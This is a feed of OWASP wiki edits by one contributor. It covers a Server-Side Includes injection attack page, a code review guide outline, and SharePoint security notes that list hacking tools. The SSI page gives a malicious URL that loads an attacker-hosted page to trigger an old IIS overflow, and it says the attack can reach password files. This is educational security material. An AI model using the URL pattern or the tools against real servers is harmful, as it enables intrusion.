OWASP - User contributions [en]

Server-Side Includes (SSI) Injection

2016-01-28T01:34:26Z

Glenn 'devalias' Grant: Make sure to wrap examples in nowiki

{{Template:Attack}}
<br>
[[Category:OWASP ASDR Project]]

Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==
SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:

< ! # = / . " - > and [a-zA-Z0-9]

Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.

In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the web server process owner.

The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. The web server parses and executes the directives before supplying the page. Then, the attack result will be viewable the next time that the page is loaded for the user's browser.

==Risk Factors ==
TBD
[[Category:FIXME|need content here]]

== Examples ==

=== Example 1===

The commands used to inject SSI vary according to the server operational system in use. The following commands represent the syntax that should be used to execute OS commands.

'''Linux:'''

List files of directory:

<nowiki></nowiki>

Access directories:

<nowiki></nowiki>

'''Windows:'''

List files of directory:

<nowiki></nowiki>

Access directories:

<nowiki></nowiki>

To show current document filename:

<nowiki></nowiki>

To show virtual path and filename:

<nowiki></nowiki>

Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:

<nowiki></nowiki>

Using the “fsize” command, it is possible to print the size of selected file:

<nowiki></nowiki>

===Example 3===

An old vulnerability in the IIS versions 4.0 and 5.0 allows an attacker to obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0506 CVE 2001-0506].

By creating a malicious page containing the SSI code bellow and forcing the application to load this page ([[Path Traversal]] attack), it’s possible to perform this attack:

ssi_over.shtml

<nowiki></nowiki>

PS: The number of “U” needs to be longer than 2049.

Forcing application to load the ssi_over.shtml page:

Non-malicious URL:

<nowiki>www.vulnerablesite.org/index.asp?page=news.asp</nowiki>

Malicious URL:
<nowiki>www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml</nowiki>

If the IIS return a blank page it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and executes arbitrary code.

==Related [[Threat Agents]]==
* [[:Category:Command Execution]]

==Related [[Attacks]]==
*[[Code Injection]]

==Related [[Vulnerabilities]]==
* [[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==
* [[:Category:Input Validation Vulnerability]]

==References==
* http://www.comptechdoc.org/independent/web/cgi/ssimanual/ssiexamples.html - SSI Examples

[[Category:FIXME|link not working

* http://www.students.mines.edu/examples/ - CGI and SSI Examples

]]

[[Category:Injection]]

[[Category:Attack]]

User:Glenn 'devalias' Grant

2016-01-08T01:32:05Z

Glenn 'devalias' Grant: Update bio

Born to the internet and raised in a dark cave somewhere in the Snowy Mountains, Glenn is a full-stack, polyglot developer with an acute interest in the offensive side of security (and a love/hate relationship with jargon). Whether it's something familiar or seeing just how deep that new rabbit hole goes, if it involves tech, caffeine or adrenaline, you'll likely find Glenn somewhere close by.

== Find me around the web ==

* '''Tech Blog''' http://blog.devalias.net/
* '''Website''' http://www.devalias.net/
* '''Twitter''' https://twitter.com/_devalias
* '''Github''' https://github.com/alias1

== Advisories/Etc ==

* '''25 July 2013''' [http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20130725_00 SYM13-008 Symantec Web Gateway Security Issues]
* '''22 August 2013''' [http://seclists.org/fulldisclosure/2013/Aug/232 DAHAX-2013-001 Cloudflare XSS Vulnerability ]

OWASP Code Review V2 Table of Contents

2016-01-08T01:27:28Z

Glenn 'devalias' Grant: Glenn 'devalias' Grant moved page OWASP Code review V2 Table of Contents to OWASP Code Review V2 Table of Contents: Correct capitalisation as used on category page

= '''OWASP Code Review Guide v2.0:''' =

==Forward==
# Author - Eoin Keary
# Previous version to be updated:[[https://www.owasp.org/index.php/Code_Review_Guide_History]]
'''[[CRV2_Forward|Content here]]'''

== Code Review Guide Introduction==
# Author - Eoin Keary
# Previous version to be updated:[[https://www.owasp.org/index.php/Code_Review_Introduction]]
'''[[CRV2_Introduction|Content here]]'''

=== What is source code review and Static Analysis ===
=== What is Code Review ===
# Author - Zyad Mghazli, Eoin Keary
# New Section
''' [[CRV2_WhatIsCodeReview|Content here]]'''

=== Manual Review - Pros and Cons ===
# Author - Zyad Mghazli, Eoin Keary,Gary David Robinson
# New Section
# Suggestion: Benchmark of different Stataic Analysis Tools Zyad Mghazli
# [[CRV2_ManualReviewProsCons|Put content here]]

=== Advantages of Code Review to Development Practices ===
# Author - Gary David Robinson
# New Section
# [[CRV2_AdvantagesToDevPractices|Put content here]]

=== Why code review ===
==== Scope and Objective of secure code review ====
# Author - Ashish Rao
# [[CRV2_WhyCodeReview|Put content here]]

=== We can't hack ourselves secure ===
# Author - Eoin Keary
# New Section
# [[CRV2_CantHackSecure|Put content here]]

=== 360 Review: Coupling source code review and Testing / Hybrid Reviews===
# Author - eoin Keary
# New Section
# [[CRV2_360Review|Put content here]]

=== Can static code analyzers do it all? ===
# Author - Ashish Rao
# New Section
# [[CRV2_CanStaticAnalyzersDoAll|Put content here]]

=Methodology=
===The code review approach===
#Author - Johanna Curiel
# [[CRV2_CodeReviewApproach|Put content here]]

==== Preparation and context ====
# Author - Gary David Robinson
# Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Preparation]]
# [[CRV2_PrepContext|Put content here]]

====Application Threat Modeling====
#Author - Larry Conklin
# Previous version to be updated: [[https://www.owasp.org/OCRG1.1:Application_Threat_Modeling]]
# [[CRV2_AppThreatModeling|Put content here]]

====Understanding Code layout/Design/Architecture====
#Author - Open
# [[CRV2_CodeLayoutDesignArch|Put content here]]
====Understanding Business Logic====
#[[CRV2_BusinessLogic|Put content here]]

===SDLC Integration===
#Author - Larry Conklin
# Previous version to be updated: [[https://www.owasp.org/index.php/Security_Code_Review_in_the_SDLC]]
# [[CRV2_SDLCInt|Put content here]]

====Deployment Models====
=====Secure deployment configurations=====
#Author -
# [[CRV2_SecDepConfig|Put content here]]

# New Section
=====Metrics and code review=====
#Author -Anthony.Scotka@tea.state.tx.us
# Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Metrics]]
# [[CRV2_MetricsCodeRev|Put content here]]

=====Source and sink reviews=====
#Author - Open
# New Section
# [[CRV2_SourceSinkRev|Put content here]]

=====Code review Coverage=====
#Author - Open
#Previous version to be updated: [[https://www.owasp.org/index.php/Code_Review_Coverage]]
# [[CRV2_CodeRevCoverage|Put content here]]

=====Design Reviews=====
#Author - Ashish Rao
*Why to review design?
**Building security in design - secure by design principle
**Design Areas to be reviewed
**Common Design Flaws
# [[CRV2_DesignRev|Put content here]]

=====A Risk based approach to code review=====
#Author - Gary David Robinson
#New Section
*"Doing things right or doing the right things..."
**"Not all bugs are equal
# [[CRV2_RiskBasedApproach|Put content here]]

====Crawling code====
#Author - Open
# Previous version to be updated: [[https://www.owasp.org/index.php/Crawling_Code]]
*API of Interest:
**Java
**.NET
**PHP
**RUBY
*Frameworks:
**Spring
**.NET MVC
**Struts
**Zend
#New Section
*Searching for code in C/C++
#Author - Gary David Robinson

# [[CRV2_CrawlingCode|Put content here]]

====Code reviews and Compliance====
#Author -Open
# Previous version to be updated: [[https://www.owasp.org/index.php/Code_Reviews_and_Compliance]]
# [[CRV2_CodeRevCompliance|Put content here]]

=Reviewing by Technical Control=
===Reviewing code for Authentication controls===
#Author - Gary Robinson
# [[CRV2_AuthControls|Put content here]]

====Forgot password====
#Author Abbas Naderi, Larry Conklin
# [[CRV2_ForgotPassword|Put content here]]

====CAPTCHA====
#Author Larry Conklin, Joan Renchie
'''[[CRV2_CAPTCHA|Content here]]'''

====Out of Band considerations====
#Author - Gary Robinson
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Authentication]]
# [[CRV2_OutofBand|Put content here]]

===Reviewing code Authorization weakness===
#Author Eoin Keary .NET MVC added
# [[CRV2_AuthorizationWeaknesses|Put content here]]

====Checking authz upon every request====
#Author - Abbas Naderi
# [[CRV2_CheckAuthzEachRequest|Put content here]]

====Reducing the attack surface====
#Author Gary Robinson
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Authorization]]
# [[CRV2_ReducingAttSurf|Put content here]]

====SSL/TLS Implementations====
#Author - Eoin Keary
# [[CRV2_SSL-TLS|Put content here]]

====Reviewing code for Session handling====
#Author - Abbas Naderi
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Session-Management]]
# [[CRV2_SessionHandling|Put content here]]

====Reviewing client side code====
#New Section
# [[CRV2_ClientSideCodeIntro|Put content here]]

=====Javascript=====
#Author - Abbas Naderi
# [[CRV2_ClientSideCodeJScript|Put content here]]

=====JSON=====
#Author - Open
# [[CRV2_ClientSideCodeJSon|Put content here]]

=====Content Security Policy=====
#Author - Open
# [[CRV2_ClientSideCodeContSecPolicy|Put content here]]

====="Jacking"/Framing=====
#Author - Eoin Keary
# [[CRV2_ClientSideCodeJackingFraming|Put content here]]

=====HTML 5?=====
#Author - Open
# [[CRV2_ClientSideCodeHTML5|Put content here]]

=====Browser Defenses=====
#Author - Open
# [[CRV2_ClientSideCodeBrowserDefPol|Put content here]]

=====etc...=====

====Review code for input validation====
#Author - Open
# [[CRV2_InputValIntro|Put content here]]

=====Regex Gotchas=====
#Author - Open
#New Section
# [[CRV2_InputValRegexGotchas|Put content here]]

=====ESAPI=====
#Author - Open
#New Section
# Internal Link: [[https://www.owasp.org/index.php/Codereview-Input_Validation]]
# [[CRV2_InputValESAPI|Put content here]]

=====Microsoft Web Protection Library=====
#Author - Michael Hidalgo
#New Section
# Internal Link: [[https://www.owasp.org/index.php/Codereview-Input_Validation]]
# [[CRV2_InputValMicrosoftWebProtectionLibrary|Put content here]]

====Reviewing code for contextual encoding====
[[Overall approach to content encoding and anti XSS]]
=====HTML Attribute=====
#Author - Eoin Keary
# [[CRV2_ContextEncHTMLAttribute|Put content here]]

=====HTML Entity=====
#Author - Eoin Keary
# [[CRV2_ContextEncHTMLEntity|Put content here]]

=====Javascript Parameters=====
#Author - Eoin Keary
# [[CRV2_ContextEncJscriptParams|Put content here]]

=====JQuery=====
#Author - Open
# [[CRV2_ContextEncJQuery|Put content here]]

====Reviewing file and resource handling code====
#Author - Open
# [[CRV2_FileResourceHandling|Put content here]]

====Resource Exhaustion - error handling====
#Author - Open
# [[CRV2_ResourceExhaustionErrHandling|Put content here]]

=====native calls=====
#Author Open
# [[CRV2_ResourceExhaustionNativeCalls|Put content here]]

====Reviewing Logging code - Detective Security====
#Author - Gary Robinson
* Where to Log
* What to log
* What not to log
* How to log
# Internal link: [[https://www.owasp.org/index.php/Logging_Cheat_Sheet]]
# [[CRV2_LoggingCode|Put content here]]

====Reviewing Error handling and Error messages====
#Author - Gary David Robinson
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Error-Handling]]
# [[CRV2_ErrorHandlingMessages|Put content here]]

====Reviewing Security alerts====
#Author - Gary Robinson
# [[CRV2_SecurityAlerts|Put content here]]

====Review for active defense====
#Author - Colin Watson
# [[CRV2_ActiveDefense|Put content here]]

====Reviewing Secure Storage====
#Author - Open source
# New Section
# [[CRV2_SecureStorage|Put content here]]

====Hashing & Salting - When, How and Where====
=====Encryption=====
======.NET======
#Author Larry Conklin, Joan Renchie
# Previous version to be updated: [[https://www.owasp.org/index.php/Codereview-Cryptographic_Controls]]
*''Can we talk about key storage as well i.e. key management for encryption techniques used in the application? - Ashish Rao''
'''[[CRV2_HashingandSaltingdotNet|Content here]]'''

=Reviewing by Vulnerability=
===Review Code for XSS===
#Author Examples added by Eoin Keary
# Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_Cross-Site_Scripting]]
# In reviewing code for XSS - we can give more patterns on "source to sink" patterns for ASP.NET wrf to difference versions and mechanisms to display data in a page - Ashish Rao
# [[CRV2_RevCodeXSS|Put content here]]

===Persistent - The Anti pattern===
#Author
# [[CRV2_RevCodePersistentAntiPatternIntro|Put content here]]

====.NET====
#Author Johanna Curiel, Eoin Keary
# [[CRV2_RevCodePersistentAntiPatterndotNet|Put content here]]

====.Java====
#Author Johanna Curiel
# [[CRV2_RevCodePersistentAntiPatternJava|Put content here]]

====PHP====
#Author Abbas Naderi
# [[CRV2_RevCodePersistentAntiPatternPHP|Put content here]]

====Ruby====
#Author Open
# [[CRV2_RevCodePersistentAntiPatternRuby|Put content here]]

===Reflected - The Anti pattern===
# [[CRV2_RevCodeReflectedAntiPatternIntro|Put content here]]

====.NET====
#Author Johanna Curiel
# [[CRV2_RevCodeReflectedAntiPatterndotNet|Put content here]]

====.Java====
#Author Johanna Curiel
# [[CRV2_RevCodeReflectedAntiPatternJava|Put content here]]

====PHP====
#Author Abbas Naderi
# [[CRV2_RevCodeReflectedAntiPatternPHP|Put content here]]

====Ruby====
# Author - Open
# [[CRV2_RevCodeReflectedAntiPatternIRuby|Put content here]]

===Stored - The Anti pattern===
# Author - Johanna Curiel
# [[CRV2_RevCodeStoredAntiPatternIntro|Put content here]]

====.NET====
#Author Johanna Curiel
# [[CRV2_RevCodeStoredAntiPatterndotNET|Put content here]]

====.Java====
#Author Johanna Curiel
# [[CRV2_RevCodeStoredAntiPatternJava|Put content here]]

====PHP====
#Author Johanna Curiel
# [[CRV2_RevCodeStoredAntiPatternPHP|Put content here]]

====Ruby====
#Author - Johanna Curiel
# [[CRV2_RevCodeStoredAntiPatternRuby|Put content here]]

===DOM XSS ===
#Author Larry Conklin
# [[CRV2_DOMXSS|Put content here]]

===JQuery mistakes===
#Author
# [[CRV2_JQueryMistakes|Put content here]]

===Reviewing code for SQL Injection===
#Author Gary Robinson
# Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection]]
# [[CRV2_RevCodeSQLInjection|Put content here]]

====PHP====
#Author - Mennouchi Islam Azeddine
# [[CRV2_SQLInjPHP|Put content here]]

====Java====
#Author - Johanna Curiel
# [[CRV2_SQLInjJava|Put content here]]

====.NET====
#Author - Open
# [[CRV2_SQLInjdotNET|Put content here]]

====HQL====
#Author - Open
# [[CRV2_SQLInjHQL|Put content here]]

===The Anti pattern===
#Author Larry Conklin
#[[CRV2_AntiPattern| Content here]]
https://www.owasp.org/index.php/CRV2_AntiPattern
====PHP====
#Author -
# [[CRV2_AntiPatternPHP|Put content here]]

====Java====
#Author -
#=> Searching for traditional SQL,JPA,JPSQL,Criteria,...
# [[CRV2_AntiPatternJava|Put content here]]

====.NET====
#Author Open
# [[CRV2_AntiPatterndotNet|Put content here]]

====Ruby====
#Author - Open
# [[CRV2_AntiPatternRuby|Put content here]]

====Cold Fusion====
#Author - Open
# [[CRV2_AntiPatternColdFusion|Put content here]]

===Reviewing code for CSRF Issues===
#Author Abbas Naderi
# Previous version to be updated: [[https://www.owasp.org/index.php/Reviewing_Code_for_Cross-Site_Request_Forgery]]
# This page needs to be deleted. [[CRV2_CSRFIssues|Put content here]]

===(This task has been deleted) Transactional logic / Non idempotent functions / State Changing Functions===
# [[CRV2_TransLogic|Put content here]]

===Reviewing code for poor logic /Business logic/Complex authorization===
#Author - Open
# [[CRV2_PoorLogic|Put content here]]

===Reviewing Secure Communications===
====.NET Config====
#Author Johanna Curiel, Renchie Joan
# [[CRV2_SecCommsdotNet|Put content here]]

====Spring Config====
#Author - Open
# [[CRV2_SecCommsSpringConfig|Put content here]]

====HTTP Headers====
#Author Gary Robinson
# [[CRV2_SecCommsHTTPHdrs|Put content here]]

===Tech-Stack pitfalls===
#Author Open
# [[CRV2_TechStackPitfalls|Put content here]]

===Framework specific Issues===
====Spring====
#Author - Open
# [[CRV2_FrameworkSpecIssuesSpring|Put content here]]

====Struts====
#Author - Open
# [[CRV2_FrameworkSpecIssuesStruts|Put content here]]

====Drupal====
#Author Open
# [[CRV2_FrameworkSpecIssuesDrupal|Put content here]]

====Ruby on Rails====
#Author - Open
# [[CRV2_FrameworkSpecIssuesROR|Put content here]]

====Django====
#Author Open
# [[CRV2_FrameworkSpecIssuesDjango|Put content here]]

====.NET Security / MVC====
#Author Johanna Curiel, Eoin Keary
# [[CRV2_FrameworkSpecIssuesdotNetMVC|Put content here]]

====Security in ASP.NET applications====
#Author Johanna Curiel
# [[CRV2_FrameworkSpecIssuesASPNet|Put content here]]

=====Strongly Named Assemblies=====
#Author Johanna Curiel, Larry Conklin
# [[CRV2_FrameworkSpecIssuesASPNetStrongAssembiles|Put content here]]

======Round Tripping======
# Author - Open
# [[CRV2_FrameworkSpecIssuesASPNetRT|Put content here]]

======How to prevent Round tripping======
# Author - Open
#Author Johanna Curiel
# [[CRV2_FrameworkSpecIssuesASPNetRTPrevention|Put content here]]

=====Setting the right Configurations=====
#Author Johanna Curiel
# [[CRV2_FrameworkSpecIssuesASPNetConfigs|Put content here]]

=====Authentication Options=====
#Author Johanna Curiel
# [[CRV2_FrameworkSpecIssuesASPNetAuth|Put content here]]

=====Code Review for Managed Code - .Net 1.0 and up=====
#Author Johanna Curiel
# [[CRV2_FrameworkSpecIssuesASPNetManagedCode|Put content here]]

=====Using OWASP Top 10 as your guideline=====
#Author Johanna Curiel
# [[CRV2_FrameworkSpecIssuesASPTop10|Put content here]]

=====Code review for Unsafe Code (C#)=====
#Author Johanna Curiel
# [[CRV2_FrameworkSpecIssuesASPNetUnsafeCode|Put content here]]

====PHP Specific Issues====
#Author Open
# [[CRV2_FrameworkSpecIssuesPHP|Put content here]]

====Classic ASP====
#Author Johanna Curiel
# [[CRV2_FrameworkSpecIssuesASPClassic|Put content here]]

====C#====
#Author Open
# [[CRV2_FrameworkSpecIssuesCsharp|Put content here]]

====C/C++====
#Author Open
# [[CRV2_FrameworkSpecIssuesCplusplus|Put content here]]

====Objective C====
#Author Open
# [[CRV2_FrameworkSpecIssuesObectiveC|Put content here]]

====Java====
#Author Open
# [[CRV2_FrameworkSpecIssuesJava|Put content here]]

====Android====
#Author Open
# [[CRV2_FrameworkSpecIssuesAndroid|Put content here]]

====Coldfusion====
#Author Open
# [[CRV2_FrameworkSpecIssuesColdfusion|Put content here]]

====CodeIgniter====

# Author Open
# [[CRV2_FrameworkSpecIssuesCodeIgniter|Put content here]]

=Security code review for Agile development=
#Author Carlos Pantelides
# [[CRV2_CodeReviewAgile|Put content here]]

=Code Review for Backdoors=
#Author Yiannis Pavlosoglou
The review of a piece of source code for backdoors has one excruciating difference to a traditional source code review: The fact that someone with 'commit' or 'write' access to the source code repository has malicious intentions spanning well beyond their current developer remit. Because of this difference, a code review for backdoors is often seen as a very specialised review and can sometimes be considered not a code review per say.

A traditional code review has the objective of determining if a vulnerability is present within the code, further to this if the vulnerability is exploitable and under what conditions. A code review for backdoors has the objective to determine if a certain portion of the codebase is carrying code that is unnecessary for the logic and implementation of the use cases it serves.

Further to this, the reviewer, looks for the trigger points of that logic. Typical examples include a branch statement going off to a part of assembly or obfuscated code. The reviewer is looking for patterns of abnormality in terms of code segments that would not be expected to be present under normal conditions.

An excellent introduction into how to look for rootkits in the Java programming language can be found [https://www.blackhat.com/presentations/bh-usa-09/WILLIAMS/BHUSA09-Williams-EnterpriseJavaRootkits-PAPER.pdf here]. In this paper J. Williams covers a variety of backdoor examples including file system access through a web server, as well as time based attacks involving a key aspect of malicious functionality been made available after a certain amount of time. Such examples form the foundation of what any reviewer for back doors should try to automate, regardless of the language in which the review is taking place.

=Code Review Tools=
https://www.owasp.org/index.php/CRV2_CodeReviewTools

OWASP Code review V2 Table of Contents

2016-01-08T01:27:28Z

Glenn 'devalias' Grant: Glenn 'devalias' Grant moved page OWASP Code review V2 Table of Contents to OWASP Code Review V2 Table of Contents: Correct capitalisation as used on category page

#REDIRECT [[OWASP Code Review V2 Table of Contents]]

Research for SharePoint (MOSS)

2013-11-11T22:39:36Z

Glenn 'devalias' Grant: Added SharePoint Enumerator (Professionally Evil)

This page contains research notes on Microsoft's SharePoint MOSS and WSS

== Resources==

==== Microsoft resources====
* [http://office.microsoft.com/download/afile.aspx?AssetID=AM102437421033 Security Architecture for SharePoint Products and Technologies] (Word Doc)
* [http://sharepoint.microsoft.com SharePoint Community Portal]
* [http://technet.microsoft.com/en-us/library/cc262619.aspx Downloadable book: Security for Office SharePoint Server 2007] - [http://go.microsoft.com/fwlink/?LinkID=94375 link to 277 page Doc file]
* [http://blogs.msdn.com/arpans/archive/2008/05/09/sharepoint-end-user-security.aspx SharePoint End User Security]

==== Other Resources and Documentation====
* [http://www.finalcandidate.com/en/tandp/Pages/SharePointSecurityConcepts.aspx SharePoint Security Concepts] - contains a number of other links to more material
* [http://blogs.gartner.com/neil_macdonald/2009/02/25/sharepoint-security-best-practices/ SharePoint Security Best Practices] - $995 Gartner report
* [http://sharepointmagazine.net/technical/administration/microsoft-office-sharepoint-server-2007-security-model Microsoft Office SharePoint Server 2007 Security Model]
* [http://www.cmswire.com/cms/enterprise-cms/sharepoint-security-concerns-simply-a-lack-of-governance-003551.php SharePoint Security Concerns Simply a Lack of Governance?]
* [http://www.cmswire.com/cms/enterprise-cms/governance-key-for-sharepoint-implementations-003123.php Governance Key for SharePoint Implementations]

==== Presentations ====
* HackCon 2011 - Oslo, Norway - February 16, 2011 : [http://www.stachliu.com/wp-content/uploads/2011/03/HackCon%202011%20-%20SharePoint%20Security%20-%20Feb2011.pdf SharePoint Security: Advanced SharePoint Security Tips and Tools]
* OWASP Houston Chapter - August 12, 2009 : [http://owasp.icrew.org/downloads/OWASP_ShohnTrojacek.pdf SharePoint Auditing and Penetration Testing] Presentation by: Shohn Trojacek
* from Denim group:
** [http://www.denimgroup.com/media/pdfs/DenimGroup_SecuringSharePoint_TASSCCTEC2009_20090326.pdf Securing SharePoint (PDF Format)] - TASSCC Technology Education Conference in Austin, March 26, 2009
** [http://www.denimgroup.com/media/pdfs/DenimGroup_SecuringSharePoint_TRISC_20090324.pdf Securing Sharepoint (PDF Format)] - Texas Regional Infrastructure Security Conference (TRISC) in Austin, March 24, 2009
** [http://sp.meetdux.com/archive/2009/07/08/a-primer-to-sharepoint-security.aspx A Primer to SharePoint Security] - video

==== Other interesting resources====
* [http://www.indeed.com.au/jobs?q=Moss+Security&l= MOSS Security jobs (in Australia)]
* [http://www.cmswire.com/news/topic/sharepoint Articles on CMSWire about SharePoint]

==== Other Blogs and Articles ====
* [http://www.darkreading.com/security/app-security/showArticle.jhtml?articleID=212903345 Microsoft SharePoint: A Weak Link In Enterprise Security?] - Dark Reading

==== Security related technical articles ====
* [http://www.sharepointsecurity.com/sharepoint/sharepoint-security/how-to-programmatically-disable-code-access-security/ How to Programmatically Disable Code Access Security]

== Published Security issues ==

=== SharePoint related vulnerabilities and its status ===
* {Note: Add MSRC case}
* http://milw0rm.com/exploits/8704 & http://milw0rm.com/sploits/2009-IIS-Advisory.pdf

== MOSS Security related WebParts, Tools & services ==

==== Open Source ====
* From CodePlex (see more on this search for [http://www.codeplex.com/site/search?ProjectSearchText=Sharepoint%20Security SharePoint Security]
** [http://securitytemplates.codeplex.com/ SharePoint Security Templates] (CodePlex)
** [http://spsecurity.codeplex.com/ SharePoint Security Configuration Feature]
** [http://accesschecker.codeplex.com Sharepoint Access Checker Web Part]
** [http://sitesecuritymgmt.codeplex.com/ Site Security Management Utility]
** [http://cryptocollaboration.codeplex.com/ CryptoCollaboration For SharePoint]

==== Commercially Supported ====
* [http://www.sharepointsecurity.com ARB Security Solutions (www.sharepointsecurity.com)]
* [http://www.surety.com/Offerings/AbsoluteProof/For-MS-SharePoint.aspx AbsoluteProof for MS SharePoint] - related article [http://www.cmswire.com/cms/enterprise-cms/surety-releases-absoluteproof-for-sharepoint-002471.php Surety Releases AbsoluteProof for SharePoint]
* [http://www.avepoint.com/assets/pdf/Social_Security_Administration_Case_Study.pdf Sharepoint case study (marketing doc)]

== Dangerous MOSS APIs ==

Map the security implications of MOSS APIs, for example:
* which APIs (if badly used)are vulnerable to: XSS, CSRF, SQL Injection
* configuration settings that have security implications

== SharePoint Hacking ==
==== SharePoint Hacking Tools ====
* [http://extensions.professionallyevil.com/beef.php SharePoint Enumerator | Professionally Evil] - This is a collection of 4 modules that help enumerate the SharePoint server the victim is connected to.
* [http://sparty.secniche.org/ Sparty] - MS Sharepoint and Frontpage Auditing Tool
* [https://github.com/toddsiegel/spscan SPScan] - SharePoint scanner and fingerprinter based on WPScan
* [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/ Stach & Liu's SharePoint Hacking Diggity Project] - SharePoint hacking tools project page. Currently includes such hacking tools as:
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePoint%20-%20GoogleDiggity%20Dictionary%20File SharePoint – GoogleDiggity Dictionary File] - New GoogleDiggity input dictionary file containing 118 queries that allow users to uncover SharePoint specific vulnerabilities exposed via the Google search engine. This dictionary helps assessors locate exposures of common SharePoint administrative pages, web services, and site galleries that an organization typically would not want to be made available to the public, let alone indexed by Google.
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePointURLBrute SharePointURLBrute] - SharePointURLBrute is a new SharePoint hacking utility developed to help assessors quickly test user access to 99 common SharePoint administrative pages (e.g. “Add Users” page -> /_layouts/aclinv.aspx) by automating forceful browsing attacks.
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePoint%20UserDispEnum SharePoint UserDispEnum] - UserDispEnum is a new SharePoint user enumeration tool that exploits insecure access controls to the /_layouts/UserDisp.aspx?ID=1 page. This utility cycles through the integer ID values from 1 onward to identify valid users, account names, and other related profile information that can be easily extracted from the SharePoint user profiles.
** [http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/#SharePoint%20DLP%20Tools SharePoint DLP Tools] - COMING SOON – Stach & Liu data loss prevention (DLP) tools for Microsoft SharePoint. SharePoint DLP Tools utilize administrative web services to help automate the searching of SharePoint files and lists for SSNs, credit card numbers, passwords, and other common information disclosures.

==== SharePoint Hacking Presentations ====
* '''2008'''
** [http://www.youtube.com/watch?v=DYudvh9cfZM hak5 - Episode 407 - Toorcon 2008: Robin Wood, Dan Griffin] - see 11:10 minute mark in video for interview with Dan Griffin about SharePoint Hacking.
* '''2013'''
** [http://www.youtube.com/watch?feature=player_embedded&v=AAObW2fcB_s TMI: Assessing and Exploiting SharePoint at DerbyCon 3.0]
** [https://media.blackhat.com/us-13/Arsenal/us-13-Sood-Sparty-Slides.pdf Sparty - Blackhat USA 2013] Sparty : A Frontpage and Sharepoint Auditing Tool

== WebParts Security ==

* Security ratings & mappings of MOSS Deployed Web Parts
* Security ratings & mappings of 3rd Part Web Parts

Research for SharePoint (MOSS)

2013-11-11T03:33:16Z

Glenn 'devalias' Grant: Added tool (SPScan)

This page contains research notes on Microsoft's SharePoint MOSS and WSS

== Resources==

==== Microsoft resources====
* [http://office.microsoft.com/download/afile.aspx?AssetID=AM102437421033 Security Architecture for SharePoint Products and Technologies] (Word Doc)
* [http://sharepoint.microsoft.com SharePoint Community Portal]
* [http://technet.microsoft.com/en-us/library/cc262619.aspx Downloadable book: Security for Office SharePoint Server 2007] - [http://go.microsoft.com/fwlink/?LinkID=94375 link to 277 page Doc file]
* [http://blogs.msdn.com/arpans/archive/2008/05/09/sharepoint-end-user-security.aspx SharePoint End User Security]

==== Other Resources and Documentation====
* [http://www.finalcandidate.com/en/tandp/Pages/SharePointSecurityConcepts.aspx SharePoint Security Concepts] - contains a number of other links to more material
* [http://blogs.gartner.com/neil_macdonald/2009/02/25/sharepoint-security-best-practices/ SharePoint Security Best Practices] - $995 Gartner report
* [http://sharepointmagazine.net/technical/administration/microsoft-office-sharepoint-server-2007-security-model Microsoft Office SharePoint Server 2007 Security Model]
* [http://www.cmswire.com/cms/enterprise-cms/sharepoint-security-concerns-simply-a-lack-of-governance-003551.php SharePoint Security Concerns Simply a Lack of Governance?]
* [http://www.cmswire.com/cms/enterprise-cms/governance-key-for-sharepoint-implementations-003123.php Governance Key for SharePoint Implementations]

==== Presentations ====
* HackCon 2011 - Oslo, Norway - February 16, 2011 : [http://www.stachliu.com/wp-content/uploads/2011/03/HackCon%202011%20-%20SharePoint%20Security%20-%20Feb2011.pdf SharePoint Security: Advanced SharePoint Security Tips and Tools]
* OWASP Houston Chapter - August 12, 2009 : [http://owasp.icrew.org/downloads/OWASP_ShohnTrojacek.pdf SharePoint Auditing and Penetration Testing] Presentation by: Shohn Trojacek
* from Denim group:
** [http://www.denimgroup.com/media/pdfs/DenimGroup_SecuringSharePoint_TASSCCTEC2009_20090326.pdf Securing SharePoint (PDF Format)] - TASSCC Technology Education Conference in Austin, March 26, 2009
** [http://www.denimgroup.com/media/pdfs/DenimGroup_SecuringSharePoint_TRISC_20090324.pdf Securing Sharepoint (PDF Format)] - Texas Regional Infrastructure Security Conference (TRISC) in Austin, March 24, 2009
** [http://sp.meetdux.com/archive/2009/07/08/a-primer-to-sharepoint-security.aspx A Primer to SharePoint Security] - video

==== Other interesting resources====
* [http://www.indeed.com.au/jobs?q=Moss+Security&l= MOSS Security jobs (in Australia)]
* [http://www.cmswire.com/news/topic/sharepoint Articles on CMSWire about SharePoint]

==== Other Blogs and Articles ====
